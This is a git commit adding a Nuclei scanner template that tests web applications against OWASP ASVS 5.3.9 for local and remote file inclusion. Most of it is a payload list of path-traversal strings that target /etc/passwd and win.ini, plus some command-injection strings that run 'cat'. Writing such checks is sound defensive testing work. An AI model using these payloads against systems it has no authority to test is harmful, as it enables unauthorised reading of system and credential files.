Create 5.3.9.yaml

Ahsraeisi · web-flow · commit 782344796a44 · 2024-12-06T01:02:42.000+03:30
Based on requirement 5.3.9, this template checks whether the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.

Signed-off-by: AmirHossein Raeisi &lt;96957814+Ahsraeisi@users.noreply.github.com&gt;
diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml
@@ -0,0 +1,143 @@
+id: ASVS-4-0-3-V5-3-9
+
+info:
+  name: ASVS 5.3.9 Check
+  author: AmirHossein Raeisi
+  severity: high
+  classification:
+    cwe-id: CWE-829
+  reference:
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
+    - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
+  tags: asvs,5.3.9
+  description: |
+    Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
+  metadata:
+    max-request: 90
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      LFI-RFI:
+        # LFI (Linux)
+        - '/etc/passwd'
+        - '../etc/passwd'
+        - '../../etc/passwd'
+        - '../../../etc/passwd'
+        - '/../../../../etc/passwd'
+        - '../../../../../../../../../etc/passwd'
+        - '../../../../../../../../etc/passwd'
+        - '../../../../../../../etc/passwd'
+        - '../../../../../../etc/passwd'
+        - '../../../../../etc/passwd'
+        - '../../../../etc/passwd'
+        - '../../../etc/passwd'
+        - '../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd'
+        - '/../../../../../../../../../../etc/passwd^^'
+        - '/../../../../../../../../../../etc/passwd'
+        - '/./././././././././././etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
+        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '%252e%252e%252fetc%252fpasswd'
+        - '%252e%252e%252fetc%252fpasswd%00'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
+        - '....//....//etc/passwd'
+        - '..///////..////..//////etc/passwd'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
+        - '%0a/bin/cat%20/etc/passwd'
+        - '%00/etc/passwd%00'
+        - '%00../../../../../../etc/passwd'
+        - '/../../../../../../../../../../../etc/passwd%00.jpg'
+        - '/../../../../../../../../../../../etc/passwd%00.html'
+        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
+        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '\\&apos;/bin/cat%20/etc/passwd\\&apos;'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        # LFI (Windows)
+        - '\WINDOWS\win.ini'
+        - '../../windows/win.ini'
+        - '....//....//windows/win.ini'
+        - '../../../../../windows/win.ini'
+        - '/..///////..////..//////windows/win.ini'
+        - '/../../../../../../../../../windows/win.ini'
+        - './../../../../../../../../../../windows/win.ini'
+        - '..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '\WINDOWS\win.ini%00'
+        - '\WINNT\win.ini'
+        - '\WINNT\win.ini%00'
+        - 'windows/win.ini%00'
+        - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
+        - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
+        - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
+        - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
+        - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
+        - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
+        - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+        - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
+        - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
+        - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
+        - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
+        - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+        - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
+        - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
+        - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
+          # RFI
+        - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
+    fuzzing:
+      - part: query
+        type: replace # replaces existing parameter value with fuzz payload
+        mode: multiple # replaces all parameters value with fuzz payload
+        fuzz:
+          - '{{LFI-RFI}}'
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"
